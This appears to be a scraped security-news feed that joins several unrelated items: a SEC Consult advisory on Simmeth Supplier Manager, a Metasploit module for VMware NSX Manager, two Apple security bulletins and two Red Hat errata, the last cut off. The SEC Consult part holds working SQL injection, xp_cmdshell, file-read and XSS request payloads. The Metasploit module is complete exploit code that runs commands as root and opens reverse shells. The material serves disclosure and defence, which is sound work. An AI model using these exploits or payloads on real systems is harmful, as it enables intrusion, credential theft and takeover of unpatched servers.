Simmeth System GmbH Supplier Manager (Lieferantenmanager) versions prior to 5.6 suffer from authentication bypass, code execution, cross site scripting, information leakage, remote SQL injection, and various other vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >=======================================================================               title: Multiple Critical Vulnerabilities             product: Simmeth System GmbH Supplier manager (Lieferantenmanager)  vulnerable version: < 5.6       fixed version: 5.6          CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,                      CVE-2022-44015, CVE-2022-44016, CVE-2022-44017              impact: critical            homepage: https://www.simmeth.net               found: 2022-03-01                  by: Steffen Robertz (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"We are an innovative B2B software provider for supply chain management,especially in the areas of supplier management over the entire supplierlifecycle and quality control, supply chain key figures and reporting.Our medium-sized family business is a reliable, practice-oriented partner withan extraordinary wealth of experience: since 2002, our currently more than 70medium-sized and corporate customers have trusted our solutions and ourpragmatically oriented expertise."Source: https://www.simmeth.net/en/company/about-usBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.An in-depth security analysis performed by security professionals ishighly advised, to identify and resolve potential further critical securityissues.  Vulnerability overview/description:-----------------------------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)An attacker can inject raw SQL queries. By activating MSSQL features, theattacker is able to execute arbitrary commands on the MSSQL server.2) Faulty API Design (CVE-2022-44014)A faulty API design allows an attacker to fetch arbitrary SQL tables perdesign. This will leak all user passwords and MSSQL hashes.3) Local File Access (CVE-2022-44016)An attacker can download arbitrary files from the web server by abusing an APIcall.4) Leak of Simmeth's SMTP passwordA cleartext password for the email account "LM@simmeth.net" is leaked duringthe login process.5) Stored Cross-Site Scripting (CVE-2022-44012)An attacker can execute JavaScript code in the browser of the victim if a siteis loaded. The victim's encrypted password can be stolen and most likely bedecrypted.6) Authentication Bypass (CVE-2022-44013)An attacker can access multiple API calls without authentication. Thus, alloutlined attacks can be executed without knowing any valid credentials.7) Errors in Session management (CVE-2022-44017)Due to errors in the session management, an attacker can log back into avictim's account after the victim logged out. This is due to the credentials notbeing cleaned from the local storage after logout.8) Information DisclosureMultiple requests were giving verbose error messages. This helps an attacker infinding and abusing a vulnerability.Proof of concept:-----------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)Following API call can be used to execute arbitrary SQL queries via a subqueryor stacked query in the table name. Because of vulnerability 6, only a validusername is required to send the request.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------The POC above shows an example subquery, which will respond with the resultingdataset. Stacked queries will be executed, however, the results will not becontained in the web server's reply. The example query will dump the MSSQL passwordhashes.Further attacks include arbitrary file read with the following query:(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents)sub;--And code execution via the xp_cmdshell extended procedure:(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell'nslookup some.domain';--2) Faulty API Design (CVE-2022-44014)The API design allows the frontend to supply an arbitrary table name(called <TABLE NAME HERE> in the POC below) into the following request.Because of vulnerability 6, only a valid username is required to send therequest.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "<TABLE NAME HERE>",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------This is a fault by design, as the attacker has full control of the tablename. Therefore, an arbitrary table such as the user table(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.3) Local File Access (CVE-2022-44016)The "GetImages" API call can be abused to read arbitrary files from the filesystem. This is due to the API allowing to set the image path from thefrontend.By pointing the base path to C:\, all files can be accessed.Because of vulnerability 6, the request requires no credentials.-----------------------POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1Content-Length: 229[...]{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"},},"ImagesPath":"C:\\","ListImageNames":[         "Windows\\win.ini",         "boot.ini",         "Windows\\system32\\eula.txt",         "Windows\\System32\\drivers\\etc\\hosts"]}--------------------The files are returned base64 encoded. Thus, even binary data can be extractedfrom the server.4) Leak of Simmeth's SMTP passwordThe following API call will return the current configuration. The configurationseems to contain cleartext credentials from Simmeth's SMTP server. Therequest does not require any credentials.-----------------POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1Content-Length: 70Content-Type: application/json{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}}----------------The server responds with:---------------[...]"KPIIntro":{"IsAccessLog":true,"MailSettings":{"Host":"vwp4261.webpack.hosteurope.de","IsAuthentification":true,"IsSSL":false,"LoginName":"wp10481666-supply","Password":"K***********a","Port":"25","Sender":"LM@simmeth.net"[...]--------------Thus, an attacker could send phishing mails from an official Simmeth account.5) Stored Cross-Site Scripting (CVE-2022-44012)The following request can be used to store JavaScript code into the database. Itwill be fetched and executed in the victim's browser, once the site is visited.Because of vulnerability 6, only a valid username is required to send the request.--------------POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1Content-Length: 3311{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName":"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=xonerror=alert(document.domain)>test","Lie_ID":4167},[...]---------------The XSS can be used to steal the encrypted passwords from the local storage.As the API uses cleartext passwords with every request, it is most likelypossible to exfiltrate the passwords in cleartext as well.6) Authentication Bypass (CVE-2022-44013)All API calls start by supplying the Credential Object.----------------"Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "Password: "*********"     "System": "****"   },----------------However, the password can just be removed. It seems to be only checked on thelogin API call. Thus, all requests can be made with just a username. The testedenvironment contained a User called "simmeth".Most likely this is a default user and thus always available, lowering therequirements for authenticated requests even further.7) Errors in Session management (CVE-2022-44017)An attacker can abuse a session management vulnerability in order to log backinto a user account after the user logged out.The encrypted password and username saved in the local storage of theweb browser is not cleared on logout and always stays valid. Hence, only the stateof the frontend state changes and the user appears to be logged out.An attacker can force the frontend state back into the logged in state byvisiting: https://<your-host>/LMS/LM/#main8) Information DisclosureThe application replies with verbose error messages, when triggeringexceptions. This can help an attacker to gain knowledge about the backend andaid in the development of exploits.Entering e.g. a single apostrophe into the table name of vulnerability 2 willcause the web server to print a full stack trace as well as the rest of the SQLquery. Hence, the SQL statement can easily be updated to execute properly.Vulnerable / tested versions:-----------------------------The test was conducted in version 5.4 which was found to be vulnerable.Vendor contact timeline:------------------------2022-04-01: Contacting vendor through info@simmeth.net2022-04-01: Simmeth requested to know in which customer's environment the             vulnerabilities were discovered.2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already             contains fixes. SEC Consult requests the version number of the fixed version.2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per             unencrypted email.2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new             and currently being fixed.2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.             A new API will be created until the end of the year.2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take             until end of July.2022-09-02: Asking about CVE numbers and if all customers are patched.2022-09-05: Some customers are not yet patched. Current version is phased out by the             end of september. All customers will have to upgrade until then. SEC Consult             will request CVE numbers.2022-10-05: Requested status update.2022-10-17: All customers are updated.2022-11-09: Coordinated release of security advisory.Solution:---------The vendor provides a patched version 5.6 which fixes the identifiedsecurity issues. Please approach your vendor support contact in order to receivethe patches.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF S. Robertz / @2022

Simmeth System GmbH Supplier Manager LFI / SQL Injection / Bypass

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to remote command injection. This Metasploit module exploits the vulnerability to upload and execute payloads gaining root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware NSX Manager XStream unauthenticated RCE',        'Description' => %q{          VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),          a malicious actor can get remote code execution in the context of 'root' on the appliance.          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13          are vulnerable to Remote Command Injection.          This module exploits the vulnerability to upload and execute payloads gaining root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y', # metasploit module author          'Sina Kheirkhah', # Security researcher (Source Incite)          'Steven Seeley' # Security researcher (Source Incite)        ],        'References' => [          ['CVE', '2021-39144'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],          ['URL', 'https://kb.vmware.com/s/article/89809'],          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']        ],        'DisclosureDate' => '2022-10-25',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'curl', 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def check_nsx_v_mgr    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login.jsp')    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  def execute_command(cmd, _opts = {})    b64 = Rex::Text.encode_base64(cmd)    random_uri = rand_text_alphanumeric(4..10)    xml_payload = <<~XML      <sorted-set>        <string>foo</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="java.beans.EventHandler">            <target class="java.lang.ProcessBuilder">              <command>                <string>bash</string>                <string>-c</string>                <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>              </command>            </target>            <action>start</action>          </handler>        </dynamic-proxy>      </sorted-set>    XML    return send_request_cgi({      'method' => 'PUT',      'ctype' => 'application/xml',      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),      'data' => xml_payload    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"  # that indicates the target is running VMware NSX Manager (NSX-V)  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable  def check    print_status("Checking if #{peer} can be exploited.")    res = check_nsx_v_mgr    return CheckCode::Unknown('No response received from the target!') unless res    html = res.get_html_document    html_title = html.at('title')    if html_title.nil? || html_title.text != 'VMware Appliance Management'      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')    end    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')  end  def exploit    case target['Type']    when :in_memory      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

VMware NSX Manager XStream Unauthenticated Remote Code Execution

Apple Security Advisory 2022-11-09-2 - macOS Ventura 13.0.1 addresses code execution and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1

macOS Ventura 13.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213504.

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNQACgkQ4RjMIDke  
NxkkbBAAsAYMux+v/27NK6+FvyxrTRLkR0yyzp8SorMSfPwZInNGkkEmQxjSzI0+  
D3rK9usf/pouEV9LMnR+Uf37pEdlpSDD7uXZ81m1vhN6RPkz2qD5WdM46RaWTbAS  
/xe3ZEu8+Jpr5SQSWuI+QIBr/vn9Txu/N6l/WQVxnWS+RSWO6tZLLOXMEyVk9vPx  
XJGyQywt3XYoVksvzwAgm/2yslQ+0OWphWjLp73bjQGrrIiClphxmtyvA0SN8Nds  
Ah0+X8SRjCErSN4736U1htKtClSHDowdaD2wevGGUrdRSLJQLTPPkqUPF3P/4/8i  
xW42Zgf9qucN9O89P7ONvHOIe8swtD9vf1AjFXvsDqQvMZQVFDBNXbG138V4LLws  
f5UdpUmY/0lSnVpAZQlo+xuMJSb3SMWYIB2ozhzDLHgBKTxERFB7uyrEYQgXs9XB  
1qg+BbW5uooEoMKbutw36/II/JTFRM34QxWiOJHw4cCypmuaGkSJ/8jsTJDlRvG/  
T9BchgHjBvqHFtCVNLGikkVYzEVQnQLXQAZoZMCYV0benebEIFLIaObaciQqA3F2  
N7/rvpXd5l6G3sEGwqMPT5aYj6Vm/0LBnxuTlN1xN1wgOQoS+LWL8bW+8/HjtJLa  
eyWMh8yD0o02Hf6dNIl9RTuoAKwZvmJbeqi/1uEaoL8sAP9gK1s=CjcG  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-2

Apple Security Advisory 2022-11-09-1 - iOS 16.1.1 and iPadOS 16.1.1 addresses code execution and integer overflow vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1iOS 16.1.1 and iPadOS 16.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213505.libxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeroAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNIACgkQ4RjMIDkeNxl2og/7Bwq+DwNmc4conLeNZ/4RVZ8Abf2kKMj71ZJrSov1lvW6W9l3NswznKc9pV0Cack8zm1she6dr+HNMYFcsSbFF/OTPKsf2jlZ3aZY5on7FpDdzB8bLDbw0dvSnO2Oc1mgcsBMIuSJBliUfgF0d6L6Hrj7L8Ja0pQP0W5BhcbWbd91wgj2KAQpaX6rgh7oEy7W5GRPJwLAdOfHmpzWws+PjZ3DMlLuGvGRLwEyizsLbq6rX166KG+asXZzCeWygTuKKcpZHG6FwahogBFnfl1ccTGJv4UV/9Ks3WEaZCGx5lpkgw+5H9Wx2HgXTr9Sh01CQVADadfeGp/Iat0TE2hscMZaTm2A1ZdmOeyK70r0jXvCCHtna9spbPO7N0OBERsqS9fC+X/XVHuehIzoUXxFUJAuaXD2weBZHJZBZ7MoUqNm50taDqoYUX0yB2BU0uWOitKfghLRBuFhpuUZtRaZdRfDLSEjSxCTCtGwWnIj4lLlZbE9RAwNNCU12+z6pHHlTxZ9c6IiQF8mrIx4IJ0OMIk6oH3gm71l8T5FSMiLCcuInL0XwC5ragJ/irrxq3GuXL8x+3BjgxnRy4kKy6KUwZsLFp7OI71X/hyjEIyhcXopiRz0PXrooluRUtooyxSCV8M9u3658pFT2+X4WvQASmk3z+ZUnTBQXrfNgWkxyUs=JERa-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-1

Red Hat Security Advisory 2022-7935-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: pcs security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:7935-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7935  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-1049  
====================================================================  
1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage (v. 9) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* pcs: improper authentication via PAM (CVE-2022-1049)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1301204 - Some stonith resource changes require "pcs resource"  
2024522 - [RFE] Provide a way to add a scsi **mpath** fencing device to a cluster without requiring a restart of all cluster resources  
2026725 - booth: pcs should check that '/etc/booth' exists  
2029844 - [WebUI] Overhaul "Add existing cluster" wizard  
2039884 - [WebUI][RFE] support SBD management  
2053177 - booth: pcs should validate ticket names  
2054671 - [RFE] Generate UUID for each cluster  
2058243 - pcs booth ticket add does not recognize mode option  
2058246 - Prevent fence_sbd in combination with stonith-watchdog-timeout>0  
2058247 - [RFE] Provide easier management of constraints created by pcs move command  
2058251 - [RFE] Provide method to export commands to create all resources  
2058252 - [RFE] Provide method to export commands to create all fence devices  
2059122 - Hiding Server Name HTTP header from TornadoServer(used in pcs/pcsd)  
2059142 - [WebUI][RFE] Allow to change position of resource inside group  
2059145 - [WebUI] Loading cluster status (or cluster list) does not start automatically immediately after logout and login  
2059148 - [WebUI][RFE] add support for modification of utilization attributes in nodes and resources  
2059149 - [WebUI][RFE] add support to add/remove resource meta attribute  
2059177 - [WebUI] Wrong label for full permissions  
2059501 - pcs rebase bz for 9.1  
2064818 - man pcs suggests using 'stickiness' instead of 'resource-stickiness' in 'pcs resource meta'  
2066629 - CVE-2022-1049 pcs: improper authentication via PAM  
2076585 - [WebUI][RFE] add support to add/remove node attribute  
2095695 - Cannot remove a quorum device  
2097778 - Pcs WebUI - CSP headers do not restrict script source  
2102663 - 'pcs resource restart' fails with a traceback

6. Package List:

Red Hat Enterprise Linux High Availability (v. 9):

Source:  
pcs-0.11.3-4.el9.src.rpm

aarch64:  
pcs-0.11.3-4.el9.aarch64.rpm  
pcs-snmp-0.11.3-4.el9.aarch64.rpm

ppc64le:  
pcs-0.11.3-4.el9.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9.s390x.rpm  
pcs-snmp-0.11.3-4.el9.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9.x86_64.rpm  
pcs-snmp-0.11.3-4.el9.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage (v. 9):

Source:  
pcs-0.11.3-4.el9.src.rpm

ppc64le:  
pcs-0.11.3-4.el9.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9.s390x.rpm  
pcs-snmp-0.11.3-4.el9.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9.x86_64.rpm  
pcs-snmp-0.11.3-4.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1049  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMj9zjgjWX9erEAQinzA/+LoayakWdPMQpdrxTPbCDe8aywOeG27Zv  
DWgUzRmjWpwG8K7oerlLLkNPgxmto0slnRtkhxxRb0+MkoumlECUfJhGzaTsQnBk  
oLfHS7KxFLbnMp+pBHNoyw56JsOR5dITGxQihS9/N81KLOvQF+OcgswxYlUlNDOH  
v5KWsC3Odc4QcqqKWpkqBNlS+yJYNEBfDktmIuP8kQbzGFfQ39nb+4RpjmnKUEwC  
fkREm9Onag+TQaekOCi8zRLCDR9v8LqTCwqAQBGQTy2qva6Ete3eHNLjWDdB9rb/  
enQa8lFTfHHr/IJwvpQoEsLh8WdaL3zP0+DxgLy/maL9CGgpNvOdqoMqNVQ42xKj  
LsP1kiLX+9mvzHb2sUR4W5RrFrN0wJm9/r2M4d69sXgyeKs8m1FKNWGuHEvS9f5o  
ndAWM7BPXvZpbhCsZsMMqbWXztBgR8HzogM8LWfnRENi+FsN6IEXj3sbmhTpi/oe  
mN7vCP6PD9uqG1OXNgeem8zJaasPtnzl5QxQsq3H+9nXphKo6RjSotedGCPGQS5V  
ssMKB94SmxXgnLCSKxzjeVpVyCjKVNV4ZqyJ9Oz7Cxgk3XwKBYUqIaONfOW5ojEb  
MlDG6LEJSCppsPfw3k6xLxqsax+K9CzdH+VfOAS1C5GUQo5VP9uGj52kLnF7mfrw  
YX0PamRn+ZU=IOln  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7935-01

Red Hat Security Advisory 2022-7959-01 - guestfs-tools is a set of tools that can be used to make batch configuration changes to guests, get disk used/free statistics, perform backups and guest clones, change registry/UUID/hostname info, build guests from scratch, and much more. Issues addressed include buffer overflow and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: guestfs-tools security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:7959-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7959  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-2211  
====================================================================  
1. Summary:

An update for guestfs-tools is now available for Red Hat Enterprise Linux  
9.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, s390x, x86_64

3. Description:

guestfs-tools is a set of tools that can be used to make batch  
configuration changes to guests, get disk used/free statistics, perform  
backups and guest clones, change registry/UUID/hostname info, build guests  
from scratch, and much more.

Security Fix(es):

* libguestfs: Buffer overflow in get_keys leads to DoS (CVE-2022-2211)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2059286 - RFE: Rebase guestfs-tools to 1.48 in RHEL 9.1  
2072493 - [RFE] Request to add lvm system.devices cleanup operation to virt-sysprep  
2075718 - Having to use "--selinux-relabel" is not intuitive given Red Hat products default to selinux enabled.  
2089748 - Removal of "--selinux-relabel" option breaks existing scripts  
2100862 - CVE-2022-2211 libguestfs: Buffer overflow in get_keys leads to DoS  
2106286 - virt-sysprep: make an effort to support LUKS on LV

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
guestfs-tools-1.48.2-5.el9.src.rpm

aarch64:  
guestfs-tools-1.48.2-5.el9.aarch64.rpm  
guestfs-tools-debuginfo-1.48.2-5.el9.aarch64.rpm  
guestfs-tools-debugsource-1.48.2-5.el9.aarch64.rpm

noarch:  
virt-win-reg-1.48.2-5.el9.noarch.rpm

s390x:  
guestfs-tools-1.48.2-5.el9.s390x.rpm  
guestfs-tools-debuginfo-1.48.2-5.el9.s390x.rpm  
